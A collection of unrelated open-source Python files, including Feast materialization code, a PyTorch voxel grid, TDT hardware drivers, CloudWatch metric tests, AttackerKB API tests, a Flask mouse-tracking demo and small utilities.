materialization for the specified feature views.
start_date (datetime): Start date for time range of data to materialize into the online store
end_date (datetime): End date for time range of data to materialize into the online store
Examples:
Materialize all features into the online store over the interval
from 3 hours ago to 10 minutes ago.
>>> from datetime import datetime, timedelta
>>> from feast.feature_store import FeatureStore
>>>
>>> fs = FeatureStore(config=RepoConfig(provider="gcp"))
>>> fs.materialize(
>>> start_date=datetime.utcnow() - timedelta(hours=3),
>>> end_date=datetime.utcnow() - timedelta(minutes=10)
>>> )
"""
feature_views_to_materialize = []
registry = self._get_registry()
if feature_views is None:
feature_views_to_materialize = registry.list_feature_views(
self.config.project
)
else:
for name in feature_views:
feature_view = registry.get_feature_view(name, self.config.project)
feature_views_to_materialize.append(feature_view)
# TODO paging large loads
for feature_view in feature_views_to_materialize:
if isinstance(feature_view.input, FileSource):
raise NotImplementedError(
"This function is not yet implemented for File data sources"
)
if not feature_view.input.table_ref:
raise NotImplementedError(
f"This function is only implemented for FeatureViews with a table_ref; {feature_view.name} does not have one."
)
(
entity_names,
feature_names,
event_timestamp_column,
created_timestamp_column,
) = _run_reverse_field_mapping(feature_view)
offline_store = get_offline_store(self.config)
table = offline_store.pull_latest_from_table(
feature_view.input,
entity_names,
feature_names,
event_timestamp_column,
created_timestamp_column,
start_date,
end_date,
)
if feature_view.input.field_mapping is not None:
table = _run_forward_field_mapping(
table, feature_view.input.field_mapping
)
rows_to_write = _convert_arrow_to_proto(table, feature_view)
provider = self._get_provider()
provider.online_write_batch(
self.config.project, feature_view, rows_to_write
)
def _get_requested_feature_views(
feature_refs: List[str], all_feature_views: List[FeatureView]
) -> List[FeatureView]:
"""Get list of feature views based on feature references"""
feature_views_dict = {}
for ref in feature_refs:
ref_parts = ref.split(":")
found = False
for feature_view in all_feature_views:
if feature_view.name == ref_parts[0]:
found = True
feature_views_dict[feature_view.name] = feature_view
continue
if not found:
raise ValueError(f"Could not find feature view from reference {ref}")
feature_views_list = []
for view in feature_views_dict.values():
feature_views_list.append(view)
return feature_views_list
def _run_reverse_field_mapping(
feature_view: FeatureView,
) -> Tuple[List[str], List[str], str, Optional[str]]:
"""
If a field mapping exists, run it in reverse on the entity names,
feature names, event timestamp column, and created timestamp column
to get the names of the relevant columns in the BigQuery table.
Args:
feature_view: FeatureView object containing the field mapping
as well as the names to reverse-map.
Returns:
Tuple containing the list of reverse-mapped entity names,
reverse-mapped feature names, reverse-mapped event timestamp column,
and reverse-mapped created timestamp column that will be passed into
the query to the offline store.
"""
# if we have mapped fields, use the original field names in the call to the offline store
event_timestamp_column = feature_view.input.event_timestamp_column
entity_names = [entity for entity in feature_view.entities]
feature_names = [feature.name for feature in feature_view.features]
created_timestamp_column = feature_view.input.created_timestamp_column
if feature_view.input.field_mapping is not None:
reverse_field_mapping = {
v: k for k, v in feature_view.input.field_mapping.items()
}
event_timestamp_column = (
reverse_field_mapping[event_timestamp_column]
if event_timestamp_column in reverse_field_mapping.keys()
else event_timestamp_column
)
created_timestamp_column = (
reverse_field_mapping[created_timestamp_column]
if created_timestamp_column
and created_timestamp_column in reverse_field_mapping.keys()
else created_timestamp_column
)
entity_names = [
reverse_field_mapping[col] if col in reverse_field_mapping.keys() else col
for col in entity_names
]
feature_names = [
reverse_field_mapping[col] if col in reverse_field_mapping.keys() else col
for col in feature_names
]
return (
entity_names,
feature_names,
event_timestamp_column,
created_timestamp_column,
)
def _run_forward_field_mapping(
table: pyarrow.Table, field_mapping: Dict[str, str],
) -> pyarrow.Table:
# run field mapping in the forward direction
cols = table.column_names
mapped_cols = [
field_mapping[col] if col in field_mapping.keys() else col for col in cols
]
table = table.rename_columns(mapped_cols)
return table
def _convert_arrow_to_proto(
table: pyarrow.Table, feature_view: FeatureView
) -> List[Tuple[EntityKeyProto, Dict[str, ValueProto], datetime, Optional[datetime]]]:
rows_to_write = []
for row in zip(*table.to_pydict().values()):
entity_key = EntityKeyProto()
for entity_name in feature_view.entities:
entity_key.entity_names.append(entity_name)
idx = table.column_names.index(entity_name)
value = python_value_to_proto_value(row[idx])
entity_key.entity_values.append(value)
feature_dict = {}
for feature in feature_view.features:
idx = table.column_names.index(feature.name)
value = python_value_to_proto_value(row[idx])
feature_dict[feature.name] = value
event_timestamp_idx = table.column_names.index(
feature_view.input.event_timestamp_column
)
event_timestamp = row[event_timestamp_idx]
if feature_view.input.created_timestamp_column is not None:
created_timestamp_idx = table.column_names.index(
feature_view.input.created_timestamp_column
)
created_timestamp = row[created_timestamp_idx]
else:
created_timestamp = None
rows_to_write.append(
(entity_key, feature_dict, event_timestamp, created_timestamp)
)
return rows_to_write
|
StarcoderdataPython
|
6425558
|
from typing import List, Optional, Tuple
import numpy as np
import torch
from torch import Tensor
import torch.nn as nn
import torch.nn.functional as F
from .utils import discretize_points, offset_points, trilinear_interp
from .base import Explicit3D
from .._C.rep import _ext
MAX_DEPTH = 10000.0
class VoxelGrid(Explicit3D):
'''
Let's start with a simple voxel grid.
'''
def __init__(
self,
bbox: Tensor,
voxel_size: float,
use_corner: bool=True,
):
'''
bbox2voxel: https://github.com/facebookresearch/NSVF/fairnr/modules/encoder.py#L1053
bbox: array [min_x,y,z, max_x,y,z]
x represents center, O represents corner
O O O O O
x x x x
O O O O O
x x x x
O O O O O
Given a center x's coords [i,j,k]. its corners' coords are [i,j,k] + {0,1}^3
'''
super().__init__()
self.use_corner = use_corner
self.bbox = bbox
v_min, v_max = bbox[:3], bbox[3:]
steps = ((v_max - v_min) / voxel_size).round().long() + 1
# note the difference between torch.meshgrid and np.meshgrid.
center_coords = torch.stack(torch.meshgrid([torch.arange(s) for s in steps]), -1) # s_x,s_y,s_z,3
center_points = (center_coords * voxel_size + v_min).reshape(-1, 3) # start from lower bound
# self.register_buffer('center_coords', center_coords)
n_voxels = center_points.shape[0]
occupancy = torch.ones(n_voxels, dtype=torch.bool) # occupancy's length unchanges unless splitting
# corner points
if use_corner:
corner_shape = steps+1
n_corners = corner_shape.prod().item()
offset = offset_points().long() # [8, 3]
corner1d = torch.arange(n_corners).reshape(corner_shape.tolist())
center2corner = (center_coords[...,None,:] + offset).reshape(-1, 8, 3) # [..., 8,3]
center2corner = corner1d[center2corner[...,0], center2corner[...,1], center2corner[...,2]] # [..., 8]
self.register_buffer('center2corner', center2corner)
self.register_buffer('n_corners', torch.tensor(n_corners))
# keep min max voxels, for ray_intersection
max_ray_hit = min(steps.sum().item(), n_voxels)
# register_buffer for saving and loading.
self.register_buffer('occupancy', occupancy)
self.register_buffer('grid_shape', steps) # self.grid_shape = steps
self.register_buffer('center_points', center_points)
self.register_buffer('n_voxels', torch.tensor(n_voxels))
self.register_buffer('max_ray_hit', torch.tensor(max_ray_hit))
self.register_buffer('voxel_size', torch.tensor(voxel_size))
def ray_intersect(self, rays_o: Tensor, rays_d: Tensor):
'''
Args:
rays_o, Tensor, (N_rays, 3)
rays_d, Tensor, (N_rays, 3)
Return:
pts_idx, Tensor, (N_rays, max_hit)
t_near, t_far (N_rays, max_hit)
'''
pts_idx_1d, t_near, t_far = _ext.aabb_intersect(
rays_o.contiguous(), rays_d.contiguous(),
self.center_points.contiguous(), self.voxel_size, self.max_ray_hit)
t_near.masked_fill_(pts_idx_1d.eq(-1), MAX_DEPTH)
t_near, sort_idx = t_near.sort(dim=-1)
t_far = t_far.gather(-1, sort_idx)
pts_idx_1d = pts_idx_1d.gather(-1, sort_idx)
hits = pts_idx_1d.ne(-1).any(-1)
return pts_idx_1d, t_near, t_far, hits
# def get_corner_points(self, center_idx):
# corner_idx = self.center2corner[center_idx] # [..., 8]
# return self.corner_points[corner_idx] # [..., 8, 3]
def pruning(self, keep):
n_vox_left = keep.sum()
if n_vox_left > 0 and n_vox_left < keep.shape[0]:
self.center_points = self.center_points[keep].contiguous()
self.occupancy.masked_scatter_(self.occupancy, keep)
self.n_voxels = n_vox_left
self.max_ray_hit = self.get_max_ray_hit()
if self.use_corner:
c2corner_idx = self.center2corner[keep] # [..., 8]
corner_idx, center2corner = c2corner_idx.unique(sorted=True, return_inverse=True) # [.] and [..., 8]
self.center2corner = center2corner.contiguous()
self.n_corners = self.n_corners * 0 + corner_idx.shape[0]
return corner_idx
def splitting(self, feats: Optional[Tensor]=None):
offset = offset_points(device=self.center_points.device).long() # [8, 3] scale [0,1]
n_subvox = offset.shape[0] # 8
old_center_coords = discretize_points(self.center_points, self.voxel_size) # [N ,3]
self.voxel_size *= 0.5
half_voxel = self.voxel_size * 0.5
self.center_points = (self.center_points[:,None,:] + (offset*2-1) * half_voxel).reshape(-1, 3)
self.n_voxels = self.n_voxels * n_subvox
self.grid_shape = self.grid_shape * 2
self.occupancy = self.occupancy[...,None].repeat_interleave(n_subvox, -1).reshape(-1)
self.max_ray_hit = self.get_max_ray_hit()
if self.use_corner:
center_coords = (2*old_center_coords[...,None,:] + offset).reshape(-1, 3) # [8N, 3] # x2
# <==> discretize_points(self.center_points, self.voxel_size) # [8N ,3]
corner_coords = (center_coords[...,None,:] + offset).reshape(-1, 3) # [64N, 3]
unique_corners, center2corner = torch.unique(corner_coords, dim=0, sorted=True, return_inverse=True)
self.n_corners = self.n_corners * 0 + unique_corners.shape[0]
old_ct2cn = self.center2corner
self.center2corner = center2corner.reshape(-1, n_subvox)
if feats is not None:
cn2oldct = center2corner.new_zeros(self.n_corners).scatter_(
0, center2corner, torch.arange(corner_coords.shape[0], device=feats.device) // n_subvox**2)
feats_idx = old_ct2cn[cn2oldct] # [N_cn, 8]
_feats = feats[feats_idx] # [N_cn, 8, D_f]
new_feats = trilinear_interp(unique_corners-1, 2*old_center_coords[cn2oldct], _feats, 2., offset)
return new_feats
def get_max_ray_hit(self):
# keep min max voxels, for ray_intersection
min_voxel = self.center_points.min(0)[0]
max_voxel = self.center_points.max(0)[0]
aabb_box = ((max_voxel - min_voxel) / self.voxel_size).round().long() + 1
max_ray_hit = min(aabb_box.sum(), self.n_voxels)
return max_ray_hit
def load_adjustment(self, n_voxels, grid_shape):
self.center_points = self.center_points.new_empty(n_voxels, 3)
self.center2corner = self.center2corner.new_empty(n_voxels, 8)
self.occupancy = self.occupancy.new_empty(torch.tensor(grid_shape).prod())
def get_edge(self):
NotImplemented
# TODO
|
StarcoderdataPython
|
1825092
|
import json
import os
import sys
def get_installed_modules():
txt = []
for line in os.popen(f'"{sys.executable}" -m pip list --format json'):
txt.append(line)
if not txt:
return {}
data = {}
for (name, version) in map(lambda x: x.values(), json.loads("".join(txt))):
data[name.lower()] = version
return data
def get_require_modules(fp: str):
try:
# pip >=20
from pip._internal.network.session import PipSession # noqa
from pip._internal.req import parse_requirements # noqa
except ImportError:
try:
# 10.0.0 <= pip <= 19.3.1
from pip._internal.download import PipSession # noqa
from pip._internal.req import parse_requirements # noqa
except ImportError:
# pip <= 9.0.3
try:
from pip.download import PipSession
from pip.req import parse_requirements
except ImportError:
print("you should to upgrade your pip, `python -m pip install --upgrade pip`")
raise SystemExit
data = {}
session = PipSession()
for r in parse_requirements(fp, session):
if "://" in r.requirement:
continue
if "==" not in r.requirement: # must equals
raise ValueError("bad requirements")
(k, v) = r.requirement.split("==")
data[str(k.strip()).lower()] = v.strip()
return data
|
StarcoderdataPython
|
6554058
|
<filename>app.py
from flask import Flask, render_template, request, Response, make_response
from analysis.user_base import IDGenerator
from analysis.user_handling import UserCreator, UserHandler, UserPairHandler, all_matches
from config import PREVENT_SERVER_CRASH
app = Flask(__name__)
@app.route("/", methods=["GET"])
async def index():
new_user_id = IDGenerator.unique_id()
resp = make_response(render_template("website.html", userID=new_user_id))
return resp
def print_and_plot():
user = UserCreator(req=request).user()
user_handler = UserHandler(user=user)
user_handler.calc_and_store_metrics()
user_handler.insert_user()
user_handler.print_user()
UserPairHandler().insert_valid_user_pairs()
all_matches.print_user_pairs()
for user_pair in all_matches:
UserPairHandler().plot_and_save_user_pair(user_pair=user_pair)
def safe_print_and_plot():
try:
print_and_plot()
except Exception as e:
print(e)
return Response(status=400)
return Response(status=204)
@app.route("/store-txy", methods=["POST"])
async def store_mouse_position():
if PREVENT_SERVER_CRASH:
return safe_print_and_plot()
print_and_plot()
return Response(status=204)
@app.route("/users-correlated-to-me", methods=["GET"])
async def correlated_users():
return Response(status=404)
if __name__ == "__main__":
app.run(debug=True)
"""
HOW TO RUN IT
Run in terminal:
gunicorn -w 4 -b 0.0.0.0:65000 app:app
To run it normally with Tor and a normal browser you must:
a. port-forward port 65000 in your router (or any other port you aren't using)
b. find your IP
c. visit <your-IP>:65000
To test it locally using only a normal browser:
a. edit the config file to allow pair matching between non-Tor browsers
b. Open http://0.0.0.0:65000/ on two windows (not maximized)
c1. move mouse from one window into the other
c2. or alt-tab and move it
d. .. until matches are plotted.
Before re-running it, use:
killall gunicorn
"""
|
StarcoderdataPython
|
3509996
|
import sys
import numpy as np
import pdb
class StaticFns:
@staticmethod
def termination_fn(obs, act, next_obs):
assert len(obs.shape) == len(next_obs.shape) == len(act.shape) == 2
notdone = np.isfinite(next_obs).all(axis=-1) \
* (np.abs(next_obs[:,1]) <= .2)
done = ~notdone
done = done[:,None]
return done
|
StarcoderdataPython
|
6656854
|
<reponame>mgielda/hwt<gh_stars>0
from hwt.hdl.types.hdlType import HdlType
class HStream(HdlType):
"""
Stream is an abstract type. It is an array with unspecified size.
:ivar elmType: type of elements
"""
def __init__(self, elmType):
super(HStream, self).__init__()
self.elmType = elmType
def bit_length(self):
raise TypeError("Stream does not have constant size")
|
StarcoderdataPython
|
4920833
|
'''
Functions for loading the zBUS, PA5 and RPcoX drivers and connecting to the
specified device. In addition to loading the appropriate ActiveX driver, some
minimal configuration is done.
Network-aware proxies of the zBUS and RPcoX drivers have been written for
TDTPy. To connect to TDT hardware that is running on a remote computer, both
the :func:`connect_zbus` and :func:`connect_rpcox` functions take the address
of the server via a tuple (hostname, port)::
connect_rpcox('RZ6', address=(tdt_server.cns.nyu.edu, 3333))
.. autofunction:: connect_zbus
.. autofunction:: connect_rpcox
.. autofunction:: connect_pa5
.. note::
The network-aware proxy code should be considered alpha stage. Although it
appears to work in our tests, we have not deployed this in our data
aqcuisition experiments.
'''
import os
import numpy as np
import ctypes
# Initialize
import pythoncom
import pywintypes
from .dsp_error import DSPError
from . import dsp_server, actxobjects
import logging
log = logging.getLogger(__name__)
def connect_pa5(interface='GB', device_id=1, address=None):
'''
Connect to the PA5
'''
debug_string = '%d via %s interface' % (device_id, interface)
log.debug(debug_string)
try:
pythoncom.CoInitialize()
if address is None:
driver = actxobjects.PA5x()
else:
driver = dsp_server.PA5NET(address)
if not driver.ConnectPA5(interface, device_id):
raise DSPError("PA5", "Connection failed")
log.debug("Connected to PA5")
return driver
except pywintypes.com_error:
raise ImportError('ActiveX drivers from TDT not installed')
def connect_zbus(interface='GB', address=None):
'''
Connect to the zBUS interface and set the zBUS A and zBUS B triggers to low
Parameters
----------
interface : {'GB', 'USB'}
Type of interface (depends on the card that you have from TDT). See the
TDT ActiveX documentation for clarification on which interface you
would be using if you are still unsure.
address : {None, (hostname, port)}
If None, loads the ActiveX drivers directly, otherwise connects to the
remote server specified by the hostname, port tuple.
'''
try:
pythoncom.CoInitialize()
if address is not None:
driver = dsp_server.zBUSNET(address)
else:
driver = actxobjects.ZBUSx()
if not driver.ConnectZBUS(interface):
raise DSPError("zBUS", "Connection failed")
log.debug("Connected to zBUS")
# zBUS trigger is set to high for record mode, so ensure that both
# triggers are initialized to low.
driver.zBusTrigA(0, 2, 10)
driver.zBusTrigB(0, 2, 10)
log.debug("Set zBusTrigA to low")
log.debug("Set zBusTrigB to low")
return driver
except pywintypes.com_error:
raise ImportError('ActiveX drivers from TDT not installed')
def connect_rpcox(name, interface='GB', device_id=1, address=None):
'''
Connect to the specifed device using the RPcoX driver
Note that the appropriate RPcoX.Connect method is called so you do not need
to perform that step in your code.
Parameters
----------
name : {'RZ6', 'RZ5', 'RP2', ... (any valid device string) }
Name of device (as defined by the corresponding RPcoX.Connect* method).
interface : {'GB', 'USB'}
Type of interface (depends on the card that you have from TDT). See the
TDT ActiveX documentation for clarification on which interface you
would be using if you are still unsure.
device_id : int (default 1)
Id of device in the rack. Only applicable if you have more than one of
the same device (e.g. two RX6 devices).
address : {None, (hostname, port)}
If None, loads the ActiveX drivers directly, otherwise connects to the
remote server specified by the hostname, port tuple.
'''
pythoncom.CoInitialize()
debug_string = '%s %d via %s interface' % (name, device_id, interface)
log.debug(debug_string)
if address is None:
driver = actxobjects.RPcoX()
else:
driver = dsp_server.RPcoXNET(address)
if not getattr(driver, 'Connect%s' % name)(interface, device_id):
raise DSPError(name, "Connection failed")
log.debug("Connected to %s", name)
return driver
def get_cof_path(circuit_name):
'''
Given relative path, returns absolute path to circuit file. The *.rcx
extension may be omitted.
'''
search_dirs = [os.path.join(os.path.dirname(__file__), 'components'),
os.getcwd(), ]
log.debug("Searching %r", search_dirs)
success = False
if not circuit_name.endswith('.rcx'):
circuit_name += '.rcx'
log.debug("Attempting to locate circuit %s", circuit_name)
for dir in search_dirs:
circuit_path = os.path.join(dir, circuit_name)
log.debug('Checking %s', circuit_path)
if os.path.exists(circuit_path):
success = True
break
if not success:
raise IOError("Could not find circuit %s" % circuit_name)
return circuit_path
def dtype_to_type_str(data_type):
'''
Convert Numpy dtype to the type string required by TDT's libraries
TDT's ActiveX ReadTagVEX and WriteTagVEX functions require the type string
to be one of I8, I16, I32 or F32. Any valid format for specify Numpy dtype
is supported.
>>> dtype_to_type_str(np.int32)
'I32'
>>> dtype_to_type_str(np.float32)
'F32'
>>> dtype_to_type_str('float32')
'F32'
>>> dtype_to_type_str('int8')
'I8'
If a certain type is not supported by TDT, a Value error is raised:
>>> dtype_to_type_str(np.float16)
Traceback (most recent call last):
...
ValueError: Unsupported Numpy dtype
'''
if np.issubdtype(data_type, np.integer):
type_code = 'I'
elif np.issubdtype(data_type, np.floating):
type_code = 'F'
else:
raise ValueError("Unsupported Numpy dtype")
# Since dtype.itemsize is the number of bytes, and the number in the TDT
# type string reflects bit number, we can translate it by multiplying by 8.
# Likewise, dtype.char is 'i' for integer and 'f' for floating point
# datatypes.
type_str = "{0}{1}".format(type_code, data_type.itemsize*8)
log.debug("%r TDT type string is %s", data_type, type_str)
if type_str not in ['F32', 'I32', 'I16', 'I8']:
raise ValueError("Unsupported dtype")
return type_str
def best_sf(data_type, range):
'''
Computes the optimal scaling factor for data compression
Parameters
----------
data_type
Data type that values are being compressed to
range : scalar or tuple
Expected data range. If scalar, assumes the value falls in the range
(-range, range)
'''
data_type = np.dtype(data_type)
try:
info = np.iinfo(data_type)
except:
info = np.finfo(data_type)
return info.max/np.abs(range).max()
def resolution(data_type, scaling_factor):
'''
Computes resolution for data type given scaling factor
Parameters
----------
data_type : dtype
Numpy data type (or string)
scaling_factor : float
Scaling factor applied to data
'''
data_type = np.dtype(data_type)
if np.issubdtype(data_type, np.integer):
return 1/float(scaling_factor)
else:
raise ValueError("Float data types not supported")
CTYPES_TO_NP = {
ctypes.c_char: np.int8,
ctypes.c_wchar: np.int16,
ctypes.c_byte: np.int8,
ctypes.c_ubyte: np.uint8,
ctypes.c_short: np.int16,
ctypes.c_ushort: np.uint16,
ctypes.c_int: np.int32,
ctypes.c_uint: np.int32,
ctypes.c_long: np.int32,
ctypes.c_ulong: np.int32,
ctypes.c_float: np.float32,
ctypes.c_double: np.float64,
}
# Reverse lookup
NP_TO_CTYPES = dict((np.dtype(v), k) for k, v in CTYPES_TO_NP.items())
def shmem_as_ndarray(raw_array):
'''
Create a ndarray wrapper around shared memory space
'''
address = raw_array._wrapper.get_address()
size = raw_array._wrapper.get_size()
dtype = CTYPES_TO_NP[raw_array._type_]
class NDArrayView(object):
pass
d = NDArrayView()
d.__array_interface__ = {
'data': (address, False),
'typestr': np.dtype('uint8').str,
'descr': np.dtype('uint8').descr,
'shape': (size,),
'strides': None,
'version': 3,
}
return np.asarray(d).view(dtype=dtype)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
StarcoderdataPython
|
3304378
|
<gh_stars>1-10
import datetime
import time
import boto3
from unittest import TestCase
from mock import MagicMock
from src.cloudwatch_metrics_client.cloudwatch import CloudWatchSyncMetrics, CloudWatchSyncMetricReporter
class TestCloudwatch(TestCase):
def setUp(self) -> None:
boto3.client = MagicMock()
self.reporter = CloudWatchSyncMetricReporter(report_interval=None)
CloudWatchSyncMetrics.with_namespace('test_namespace').with_reporter(self.reporter)
CloudWatchSyncMetrics.setup_client()
def test_recording_metric(self):
CloudWatchSyncMetrics.put_metric(MetricName='test_metric', Value=100)
metrics = list(self.reporter.metrics.values())[0].to_repr()
self.assertEqual('test_metric', metrics['MetricName'])
self.assertEqual(100, metrics['Values'][0])
self.assertEqual(1, metrics['Counts'][0])
self.assertIsNone(metrics.get('Dimensions'))
self.assertIsInstance(metrics['Timestamp'], datetime.datetime)
def test_sync_decorator(self):
@CloudWatchSyncMetrics.monitored_task
def task():
time.sleep(0.1)
task()
metrics = self.reporter.statistics
repr = metrics['transaction?'].to_repr()
self.assertEqual('transaction', repr['MetricName'])
self.assertIsNone(repr.get('Dimensions'))
self.assertEqual(1, repr['StatisticValues']['SampleCount'])
self.assertLess(100000, repr['StatisticValues']['Sum'])
self.assertGreater(150000, repr['StatisticValues']['Sum'])
self.assertEqual('Microseconds', repr['Unit'])
def test_sync_decorator_with_dimensions(self):
def test():
task()
metrics = list(self.reporter.statistics.values())[0].to_repr()
self.assertEqual('transaction', metrics['MetricName'])
self.assertDictEqual({'Name': 'Test_Dimension', 'Value': 'ValueX'}, metrics['Dimensions'][0])
self.assertEqual(1, metrics['StatisticValues']['SampleCount'])
self.assertLess(100000, metrics['StatisticValues']['Sum'])
self.assertGreater(150000, metrics['StatisticValues']['Sum'])
self.assertEqual('Microseconds', metrics['Unit'])
task2()
metrics = list(self.reporter.statistics.values())[1].to_repr()
self.assertEqual('transaction', metrics['MetricName'])
self.assertDictEqual({'Name': 'Test_Dimension', 'Value': 'ValueY'}, metrics['Dimensions'][0])
self.assertEqual(1, metrics['StatisticValues']['SampleCount'])
self.assertLess(100000, metrics['StatisticValues']['Sum'])
self.assertGreater(150000, metrics['StatisticValues']['Sum'])
self.assertEqual('Microseconds', metrics['Unit'])
@CloudWatchSyncMetrics.monitored_task
def task():
CloudWatchSyncMetrics.with_monitored_dimension('Test_Dimension', 'ValueX')
time.sleep(0.1)
@CloudWatchSyncMetrics.monitored_task
def task2():
CloudWatchSyncMetrics.with_monitored_dimension('Test_Dimension', 'ValueY')
time.sleep(0.1)
test()
metrics = list(self.reporter.statistics.values())
self.assertEqual(2, len(metrics))
def test_reporter(self):
self.stored_kwargs = None
def put_data(**kwargs):
self.stored_kwargs = kwargs
return {'ResponseMetadata': {'HTTPStatusCode': 200}}
CloudWatchSyncMetrics.client = MagicMock()
CloudWatchSyncMetrics.client.put_metric_data = put_data
def test():
reporter = CloudWatchSyncMetricReporter(report_interval=0.5)
CloudWatchSyncMetrics.with_reporter(reporter)
reporter.run()
CloudWatchSyncMetrics.put_metric(MetricName='test_metric_2', Value=50)
self.assertIsNone(self.stored_kwargs)
time.sleep(0.7)
reporter.stop()
self.assertEqual('test_metric_2', self.stored_kwargs['MetricData'][0]['MetricName'])
self.assertEqual(50, self.stored_kwargs['MetricData'][0]['Values'][0])
self.assertEqual(1, self.stored_kwargs['MetricData'][0]['Counts'][0])
test()
|
StarcoderdataPython
|
8135929
|
from django.urls import path
from . import views
urlpatterns=[
path("",views.index,name="index"),
path("register",views.register,name="register"),
path("login",views.login,name="login"),
path("logout",views.logout,name="logout")
]
|
StarcoderdataPython
|
6475949
|
<reponame>busterb/attackerkb-api<filename>tests/test_read.py<gh_stars>1-10
import pytest
import os
from attackerkb_api import AttackerKB, ApiError
API_KEY = os.environ.get("API_KEY")
def test_api_fail():
with pytest.raises(ApiError):
api = AttackerKB(api_key="")
def test_api():
api = AttackerKB(api_key=API_KEY)
api = AttackerKB(api_key=API_KEY)
def test_single_topic():
result = api.get_single_topic('6685ce4d-9523-4078-92d3-f08418c9770a')
assert result['id'] == '6685ce4d-9523-4078-92d3-f08418c9770a'
def test_search_topic():
result = api.get_topics(name="CVE-2020-10560")
assert result[0]['id'] == "6f81bc44-c000-427d-b222-b64c29bda621"
def test_search_topic_params():
result = api.get_assessments(topicId='131226a6-a1e9-48a1-a5d0-ac94baf8dfd2', page=0, size=2, sort="score:asc")
assert len(result) == 2
def test_single_topic_fail():
with pytest.raises(ApiError):
result = api.get_single_topic('not a uuid')
def test_single_assesment():
result = api.get_single_assessment('7c324b6e-0d83-4392-a79f-b61220ebfff3')
assert result['id'] == '7c324b6e-0d83-4392-a79f-b61220ebfff3'
def test_multi_assesment():
result = api.get_assessments(topicId='131226a6-a1e9-48a1-a5d0-ac94baf8dfd2')
assert len(result) >=2
def test_single_assesment_fail():
with pytest.raises(ApiError):
result = api.get_single_assessment('not a uuid')
def test_single_user_id():
result = api.get_single_contributor('7ff62803-e0a8-4121-b324-d4afe9f60d43')
assert result['id'] == '7ff62803-e0a8-4121-b324-d4afe9f60d43'
def test_single_user_name():
result = api.get_single_contributor('KevTheHermit')
assert result['username'] == 'kevthehermit'
|
StarcoderdataPython
|
3212227
|
<filename>Python/SampleScripts/simple_form.py
#!/usr/bin/python
# Import the CGI module
import cgi
# Required header that tells the browser how to render the HTML.
print "Content-Type: text/html\n\n"
# Define function to generate HTML form.
def generate_form():
print "<html>\n"
print "<head>\n"
print "\t<meta content='text/html; charset=utf-8' http-equiv='Content-Type'>\n"
print "\t<title>Name and Age Form</title>\n"
print "</head>\n"
print "<body bgcolor = white>\n"
print "\t<h3>Please, enter your name and age.</h3>\n"
print "\t<table border = 0>\n"
print "\t\t<form method = post action = \"simple_form.py\">\n"
print "\t\t<tr><th>Name:</th><td><input type = text name = \"name\"></td><tr>\n"
print "\t\t<tr><th>Age:</th><td><input type = text name = \"age\"></td></tr>\n"
print "\t</table>\n"
print "\t<input type = hidden name = \"action\" value = \"display\">\n"
print "\t<input type = submit value = \"Enter\">\n"
print "\t</form>\n"
print "</body>\n"
print "</html>\n"
# Define function display data.
def display_data(name, age):
print "<html>\n"
print "<head>\n"
print "\t<title>Age and Name Information Form</title>\n"
print "</head>\n"
print "<body>\n"
print "<h1>Name and Age Response Form</h1>"
print "<p>The name entered was: %s</p>" % (name)
print "<p>The age entered was: %s</p>" % (age)
print "<p>%s, you are %s years old.</p>" % (name, age)
print "</BODY>\n"
print "</HTML>\n"
# Define main function.
def main():
form = cgi.FieldStorage()
if (form.has_key("action") and form.has_key("name") and form.has_key("age")):
if (form["action"].value == "display"):
display_data(form["name"].value, form["age"].value)
else:
generate_form()
def mainTest():
generate_form()
# Call main function.
main()
|
StarcoderdataPython
|
1604769
|
from typing import Iterable, Union, TYPE_CHECKING
from dotty_dict import Dotty
from marshmallow import Schema
from marshmallow.fields import Nested, Dict, List
if TYPE_CHECKING:
from ddb.feature import Feature
def _get_stop_fields_from_schema(schema: Schema, stack, ret):
for field_name, field in schema.fields.items():
stack.append(field_name)
if isinstance(field, Dict):
ret.append(tuple(stack))
if isinstance(field, List):
ret.append(tuple(stack))
if isinstance(field, Nested):
_get_stop_fields_from_schema(field.schema, stack, ret)
stack.pop()
def _get_stop_fields(features: Iterable['Feature']):
ret = []
stack = []
for feature in features:
stack.append(feature.name)
_get_stop_fields_from_schema(feature.schema(), stack, ret)
stack.pop()
return ret
def to_environ(data: Union[Dotty, dict], env_prefix) -> dict:
"""
Export configuration to environment dict.
"""
return _flatten(env_prefix, "_", "_%s_",
lambda x: str.upper(x).replace('-', '_'),
str,
data=dict(data))
def flatten(data: Union[Dotty, dict], prefix=None, sep=".", array_index_format="[%s]",
key_transformer=None, value_transformer=None, keep_primitive_list=False,
stop_for_features=None) -> dict:
"""
Export configuration to a flat dict.
"""
stop_for = tuple(map(sep.join, _get_stop_fields(stop_for_features))) if stop_for_features is not None else ()
return _flatten(prefix, sep, array_index_format,
key_transformer, value_transformer,
keep_primitive_list, stop_for, data=dict(data))
def _flatten(prefix=None, sep=".", array_index_format="[%s]",
key_transformer=None, value_transformer=None, keep_primitive_list=False,
stop_for=(), data=None, output=None) -> dict:
if output is None:
output = {}
if prefix is None:
prefix = ""
if key_transformer is None:
key_transformer = lambda x: x
if value_transformer is None:
value_transformer = lambda x: x
stop_recursion = False
if prefix in stop_for:
stop_recursion = True
if not stop_recursion and isinstance(data, dict):
for (name, value) in data.items():
key_prefix = (prefix + sep if prefix else "") + key_transformer(name)
key_prefix = key_transformer(key_prefix)
_flatten(key_prefix, sep, array_index_format,
key_transformer, value_transformer, keep_primitive_list,
stop_for, value, output)
elif not stop_recursion and isinstance(data, list):
if keep_primitive_list and (not data or
not set(filter(lambda x: x not in (int, float, bool, str), set(map(type, data))))):
output[prefix] = value_transformer(data)
else:
i = 0
for value in data:
replace_prefix = (prefix if prefix else "") + (array_index_format % str(i))
replace_prefix = key_transformer(replace_prefix)
_flatten(replace_prefix, sep, array_index_format,
key_transformer, value_transformer, keep_primitive_list,
stop_for, value, output)
i += 1
else:
output[prefix] = value_transformer(data)
return output
|
StarcoderdataPython
|
11316199
|
<filename>plot_result.py
import numpy as np
import argparse
import matplotlib.pyplot as plt
import copy
import scipy.io as sio
if __name__ == '__main__':
trial = 50
K = 20
N = 1
SNR = 100
B = 0
E = 1
lr = 0.05
PL = 3.0
P_r = 0.1
iid = 1
noniid_level = 2
loc = 50
kappa = 0.4
filename = 'store/trial_{}_K_{}_N_{}_B_{}_E_{}_lr_{}_SNR_{}_PL_{}_Pr_{}.npz'.format(trial, K, N, B, E, lr, SNR, PL,
P_r)
print(filename)
nmse = np.zeros(5)
a = np.load(filename, allow_pickle=1)
result_CNN_set = a['arr_1']
result_MSE_set = a['arr_2']
result_NMSE_set = a['arr_2']
nmse1 = a['arr_3']
